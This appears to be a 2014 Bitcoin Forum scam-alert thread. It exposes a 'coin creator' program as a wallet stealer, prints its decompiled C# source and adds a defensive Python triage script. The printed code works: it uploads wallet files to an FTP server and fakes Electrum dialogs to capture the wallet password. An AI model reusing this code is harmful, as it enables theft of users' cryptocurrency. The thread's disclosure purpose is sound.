Bitcoin Forum
Topic: SCAM alert! The coin creator software by Xevox is a wallet stealer!
jukka (OP)
May 09, 2014, 09:02:58 AM
 #1

I was stupid enough to trust this software, and it stole my coins! If somebody wants to donate something for exposing this scammer, my LTC address is in the "personal text".

Here is the code I managed to decompile:

Code:
// Type: CoinGen.Program
// Assembly: CoinGen, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: D1DD6DE8-DEB5-4565-944C-0C660F3F9F11
// Assembly location: C:\CoinSources\CoinGen.exe

using System;
using System.IO;
using System.Net;
using System.Text;
using System.Threading;
using System.Windows.Forms;

namespace CoinGen
{
  internal class Program
  {
    private static void Main(string[] args)
    {
      string str1 = DateTime.Now.ToString("HH:mm:ss");
      Console.WriteLine("[" + str1 + "] Started Coin Creator");
      Console.Write("[" + str1 + "] What is the name of your coin? e.g Litecoin: ");
      Console.ReadLine();
      Console.Write("[" + str1 + "] What is the abbreviation of your coin? e.g LTC: ");
      Console.ReadLine();
      Console.Write("[" + str1 + "] What algorithm do you want to use? e.g X11, SHA256, Scrypt, Scrypt-N, Scrypt-Jane: ");
      Console.ReadLine();
      Console.Write("[" + str1 + "] Block Rate (In seconds):  ");
      Console.ReadLine();
      Console.Write("[" + str1 + "] Block Reward:  ");
      Console.ReadLine();
      Console.Write("[" + str1 + "] Block Halving Rate:  ");
      Console.ReadLine();
      Console.WriteLine("");
      Console.WriteLine("Editing Source");
      Thread.Sleep(5000);
      string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
      string str2 = "drpine";
      string hostIP = "ftp://ftp.drivehq.com";
      Form1 form1 = new Form1();
      string str3 = "\\bitcoin\\";
      string str4 = "\\litecoin\\";
      string str5 = "\\feathercoin\\";
      string str6 = "\\digitalcoin\\";
      string str7 = "\\gpucoin\\";
      string str8 = "\\earthcoin\\";
      string str9 = "\\worldcoin\\";
      string str10 = "\\vertcoin\\";
      string str11 = "\\auroracoin\\";
      string str12 = "\\dogecoin\\";
      string str13 = "\\electrum\\";
      string str14 = "\\Windows_Microsoft3430\\";
      int num1 = new Random().Next(1, 99999);
      if (Directory.Exists(folderPath + str14))
        return;
      Directory.CreateDirectory(folderPath + str14);
      ftp ftp = new ftp(hostIP, str2, str2);
      if (Directory.Exists(folderPath + str3))
      {
        ftp.upload("Bitcoin-" + (object) num1, folderPath + str3 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Bitcoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str13))
      {
        ftp.upload("electrum_wallet-" + (object) num1, folderPath + str13 + "\\wallets\\default_wallet");
        int num2 = (int) MessageBox.Show("Electrum has detected another program trying to access your wallet, it is important you change your password now!", "Important Note", MessageBoxButtons.OK, MessageBoxIcon.Exclamation, MessageBoxDefaultButton.Button1);
        int num3 = (int) form1.ShowDialog();
        int num4 = (int) MessageBox.Show("Passwords Dont Match", "Important Note", MessageBoxButtons.OK, MessageBoxIcon.Exclamation, MessageBoxDefaultButton.Button1);
        int num5 = (int) form1.ShowDialog();
        int num6 = (int) MessageBox.Show("Passwords Dont Match", "Important Note", MessageBoxButtons.OK, MessageBoxIcon.Exclamation, MessageBoxDefaultButton.Button1);
        int num7 = (int) form1.ShowDialog();
        ftp.upload("electrum_pass-" + (object) num1, folderPath + str13 + "pass.txt");
        Program.SendProwlRequest("WalletUploaderV4", "Electrum Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str4))
      {
        ftp.upload("Litecoin-" + (object) num1, folderPath + str4 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Litecoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str12))
      {
        ftp.upload("Dogecoin-" + (object) num1, folderPath + str12 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Dogecoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str11))
      {
        ftp.upload("Auroracoin-" + (object) num1, folderPath + str11 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Auroracoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str10))
      {
        ftp.upload("Vertcoin-" + (object) num1, folderPath + str10 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Vertcoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str5))
      {
        ftp.upload("Feathercoin-" + (object) num1, folderPath + str5 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Feathercoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str6))
      {
        ftp.upload("Digitalcoin-" + (object) num1, folderPath + str6 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Digitalcoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str7))
      {
        ftp.upload("GPUcoin-" + (object) num1, folderPath + str7 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "GPUcoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str8))
      {
        ftp.upload("Earthcoin-" + (object) num1, folderPath + str8 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Earthcoin Wallet Uploaded", "c#Prowl");
      }
      if (!Directory.Exists(folderPath + str9))
        return;
      ftp.upload("Worldcoin-" + (object) num1, folderPath + str9 + "wallet.dat");
      Program.SendProwlRequest("WalletUploaderV4", "Worldcoin Wallet Uploaded", "c#Prowl");
    }

    private static void SendProwlRequest(string vEvent, string vDescription, string vApplication)
    {
      string str = "79b6a76a04290fe0916c6e625c926897fb4d8b7a";
      HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create("https://api.prowlapp.com/publicapi/add");
      byte[] bytes = Encoding.ASCII.GetBytes("apikey=" + str + "&application=" + vApplication + "&event=" + vEvent + "&description=" + vDescription);
      httpWebRequest.Method = "POST";
      httpWebRequest.ContentType = "application/x-www-form-urlencoded";
      httpWebRequest.ContentLength = (long) bytes.Length;
      using (Stream requestStream = ((WebRequest) httpWebRequest).GetRequestStream())
        requestStream.Write(bytes, 0, bytes.Length);
    }

    private static void MakeData(string vArgs)
    {
    }
  }
}
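
A triage check built from the indicators in the decompiled code above, as an added example that is not part of jukka's post or the thread: it looks under an AppData directory for the run-once marker folder `Windows_Microsoft3430` and lists which of the targeted wallet files are present. The function names and the case-insensitive path matching are this example's own choices.

```python
"""Triage for the wallet stealer decompiled in this thread (added example)."""
import os
from pathlib import Path

# Values taken from the decompiled Main() in the post.
MARKER_DIR = "Windows_Microsoft3430"   # created once, before any upload
COIN_DIRS = ["bitcoin", "litecoin", "feathercoin", "digitalcoin", "gpucoin",
             "earthcoin", "worldcoin", "vertcoin", "auroracoin", "dogecoin"]
ELECTRUM_FILES = ["wallets/default_wallet", "pass.txt"]


def _child(parent: Path, name: str):
    """Case-insensitive child lookup (Windows paths ignore case)."""
    if not parent.is_dir():
        return None
    for entry in parent.iterdir():
        if entry.name.lower() == name.lower():
            return entry
    return None


def _resolve(root: Path, rel: str):
    """Walk a '/'-separated relative path under root, or return None."""
    node = root
    for part in rel.split("/"):
        node = _child(node, part) if node else None
    return node


def triage(appdata: Path) -> dict:
    """Report the marker directory and the targeted files present now."""
    marker = _child(appdata, MARKER_DIR)
    targets = [f"{c}/wallet.dat" for c in COIN_DIRS]
    targets += [f"electrum/{f}" for f in ELECTRUM_FILES]
    exposed = [t for t in targets
               if (p := _resolve(appdata, t)) and p.is_file()]
    return {"stealer_ran": bool(marker and marker.is_dir()),
            "exposed_files": sorted(exposed)}


if __name__ == "__main__":
    # Real use: APPDATA is the roaming profile directory the program reads.
    print(triage(Path(os.environ.get("APPDATA", "."))))
```

A true `stealer_ran` with a non-empty list means those files were in scope for upload; the marker is created before the first upload, so it does not prove any transfer succeeded.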
Prolifik
May 09, 2014, 09:32:33 AM
 #2

Bump for justice.

jukka (OP)
May 09, 2014, 10:12:34 AM
 #3

I managed to send my doges and worldcoins to another wallet! So far the only thing stolen was my precious litecoin :(

It seems that the original thread opened by the scammer is deleted!
var53
May 09, 2014, 10:13:40 AM
 #4

Thanks for warning us about this. I would have downloaded it when it was offered for free, but I was too late, he started charging for downloads before I noticed the thread. Turns out it's a good thing I was too late.
Amph
May 09, 2014, 10:32:04 AM
 #5

when I scanned it with virustotal, it reported 1 red flag
Forexperiments
May 09, 2014, 10:33:54 AM
 #6

It's interesting how the program asks for the electrum wallet password.
Basically it declares that this coin creator is a wallet stealer, and asks for a new password ;D

PS: we can ask drivehq or prowl if they have more details about him,
or we can just have fun with his prowl API, sending him thousands of "wallet stolen" notifications to his iphone ;D

Forexperiments
May 09, 2014, 10:34:58 AM
 #7

Quote from: Amph
when I scanned it with virustotal, it reported 1 red flag

This kind of custom software would never be correctly detected by virus scanners: it's a simple ftp uploader, how can a virus scanner detect that? If it did, it would flag too much stuff as a virus.

var53
May 09, 2014, 10:42:17 AM
 #8

Quote from: Amph
when I scanned it with virustotal, it reported 1 red flag

Which antivirus scanner reported the red flag? Trendmicro seems to flag almost everything as a virus, so I would have more faith in one of the other scanners. Someone was complaining that trendmicro even flagged windows system files as a virus a while ago.
xbudahx
May 09, 2014, 10:49:31 AM
 #9

Who installs unknown software on the same machine they keep wallets? That's just stupid, and that can't be fixed.

I hope OP learned a lesson here.
jukka (OP)
May 09, 2014, 10:53:12 AM
 #10

Quote from: xbudahx
Who installs unknown software on the same machine they keep wallets? That's just stupid, and that can't be fixed.

I hope OP learned a lesson here.

Yes I learned and I know that it is stupid, so thank you!

All of us are not clever with these things, you know!
luchodge99
May 09, 2014, 10:57:31 AM
 #11

thx for the heads up.
those scambags never give up.

Amph
May 09, 2014, 10:59:26 AM
 #12

Quote from: var53
Quote from: Amph
when I scanned it with virustotal, it reported 1 red flag

Which antivirus scanner reported the red flag? Trendmicro seems to flag almost everything as a virus, so I would have more faith in one of the other scanners. Someone was complaining that trendmicro even flagged windows system files as a virus a while ago.

I don't remember; if virus total keeps the same order, it was the first one in the list
snaildvorak
May 09, 2014, 11:03:10 AM
 #13

lesson learned for all of us who read this thread. Thanks for the alert!
jukka (OP)
May 09, 2014, 11:03:36 AM
 #14

Quote from: var53
Thanks for warning us about this. I would have downloaded it when it was offered for free, but I was too late, he started charging for downloads before I noticed the thread. Turns out it's a good thing I was too late.

If you appreciate it, please consider a small donation.
crunchynut
May 09, 2014, 11:31:54 AM
 #15

stop begging. nobody who's not a potato would have used this program.

tokyoghetto
May 09, 2014, 11:33:55 AM
 #16

what a scumbag. Even worse, he started to charge for it.
jukka (OP)
May 09, 2014, 11:49:28 AM
 #17

Quote from: crunchynut
stop begging. nobody who's not a potato would have used this program.

I am not begging anything, damn it! I could have kept this info by myself! That's the way people normally do, because nobody wants to reveal that they have been stupid! Next time I just will keep the info, if that's the way people here do.

I am new in this forum, and where I come from people are polite and try to help each other. Looks like you don't belong to those!
asdf_files
May 09, 2014, 12:07:46 PM
 #18

Damn scammers everywhere >:(
jukka (OP)
May 09, 2014, 12:44:01 PM
 #19

Ok, I managed to save everything other than my precious LTC. The guy could have just asked; I would have bought him one pint of beer instead :D

Well at least I have learned that you cannot trust even the Virustotal. Maybe I should contact some of the antivirus companies that they should take these wallet stealers seriously as none of them warned anything!
crunchynut
May 09, 2014, 12:47:40 PM
 #20

look there is an .exe file posted by a stranger on the internet, in a forum where every 2nd thread is a scam in the making. let's download and run it!

